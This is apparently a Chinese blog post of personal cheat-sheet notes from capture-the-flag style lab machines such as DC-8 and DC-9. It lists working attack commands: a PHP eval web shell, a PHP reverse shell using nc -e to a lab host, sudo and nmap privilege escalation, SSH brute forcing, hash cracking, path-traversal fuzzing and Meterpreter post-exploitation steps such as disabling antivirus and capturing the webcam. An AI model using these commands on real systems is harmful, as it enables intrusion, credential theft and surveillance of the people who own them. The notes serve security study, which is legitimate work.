记录 Day,散

nmap -sP 192.168.37.1/24
nmap -p 1-65535 -A 192.168.37.132
nmap -sC -sS 192.168.37.132 -oA dancing

jdk自带
keytool导出ssl证书内容

以 jens 执行 jens 中的 backups.sh 文件
sudo -u jens /home/jens/backups.sh

写入文件
echo "/bin/bash" >> /home/jens/backups.sh

下载文件
wget http://192.168.37.128/xxxx.xx

执行脚本
./44444.sh xxxxx

脚本格式转换
dos2unix filename

设置所有人可以读写及执行
chmod 777 file  (等价于  chmod u=rwx,g=rwx,o=rwx file 或  chmod a=rwx file)

设置拥有者可读写,其他人不可读写执行
chmod 600 file (等价于  chmod u=rw,g=---,o=--- file 或 chmod u=rw,go-rwx file )

hydra爆破ssh
hydra -L DC-9_usernames.txt -P DC-9_passwords.txt 192.168.37.132 ssh
-f          爆到停
-t          线程

<?php @eval($_POST[sb])?>

ffmpeg -i LeafsNewSong.mp3 -an -vcodec copy cover.png    提取封面

反弹语
<?php system("nc -e /bin/bash 192.168.37.128 2333"); ?>
 
python -c "import pty; pty.spawn('/bin/bash')" 

cat -A 查看详情信息

dos 格式结尾 ^M$
unix 格式结尾 $

nmap提权
echo 'os.execute("/bin/bash")' > shell
sudo nmap --script=shell

多次访问 IP
for x in 7469 8475 9842 22;do nc 192.168.37.132 $x;done

ssh 用户名@192.168.37.132
ssh -p 21046 player@47.93.122.177

python -m SimpleHTTPServer 8080
python -m http.server xxx

mysql -u用户名 -p密码
mysql -udbuser -pR0ck3t
-u 和 -p 后面跟着的中文,不能有空格

2> 错误输出
/dev/null是一个特殊的设备文件,这个文件接收到的任何数据都会被丢弃。

openssl passwd -1 -salt Pai 123456
passwd     生成密码
-1     MD5模式
-salt     插入随机数


wpscan --url http://wordy -e u
-e     列举--enumerate
u     所列用户名长度,默认1-10

cewl 爬密码本
cewl http://192.168.37.133/ > xxx.txt


john 散列碰撞
john --wordlist=/usr/share/john/password.lst --rules DC-8_passwd_un.txt

sudo -l

ls -la

cat -A 查看脚本尾
dos 格式结尾 ^M$,unix 格式结尾 $

droopescan 扫 cms 版本、cms 页面用户名
droopescan scan wordpress -u http://192.168.37.133 -e a

wfuzz 模糊测试:
wfuzz --hw 121(参数) -b "PHPSESSID=4jbkh83u8gdeaqrg0rng8hh6ru" -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.37.132/addrecord.php?FUZZ=../../../../../../../../../etc/passwd
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.37.133/index.php?FUZZ

响应  响应行xL  响应单词数xW  响应字符xCh
加入 --hl (隐藏具有相同的 50 行数的响应)
同样有 --hc/hw

VPS 公网服务器 阿里云

curl 访问网页整理内容

ps    查看进程
pwd    查看当前处于目标机的那个目录
route    查看完整网络设置
getlwd    查看当前目录
getpid    查看当前进程号
getuid    查看当前权限
sysinfo    查看系统信息
getsystem                    自动提权
webcam snap                    抓取摄像头的照片
load espia; screengrab                抓取目标机的屏幕截图
run post/windows/gather/checkvm            查看目标机是否为虚拟机
run post/windows/manage/killav            关闭杀毒软件
run post/windows/gather/enum_applications        查看当前应用程序
run post/windows/gather/enum_logged_on_users        列举当前登录的用户
run post/windows/manage/enable_rdp            启动远程桌面协议
upload /root/45010 /tmp/45010             将攻击机的文件上传靶机

编译脚本
gcc xxxxx.c -o xxxxx

暴力破解6位未知字符,加密类型为MD5的hashcat命令
hashcat -m 0 -a 3 hashs_md5.txt ?a?a?a?a?a?a

vardump();
scandir()
file_get_contents()

使用Nmap的NSE脚本查看对方是否开启T3协议
nmap -n -v -p 7001,7002 192.168.37.137 --script=weblogic-t3-info

切换java版本
update-alternatives --config java

ssh 公钥私钥文件利用
cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh


dirb http://192.168.37.133 -X .php,.txt,.py,.zip 


 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Part 03

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值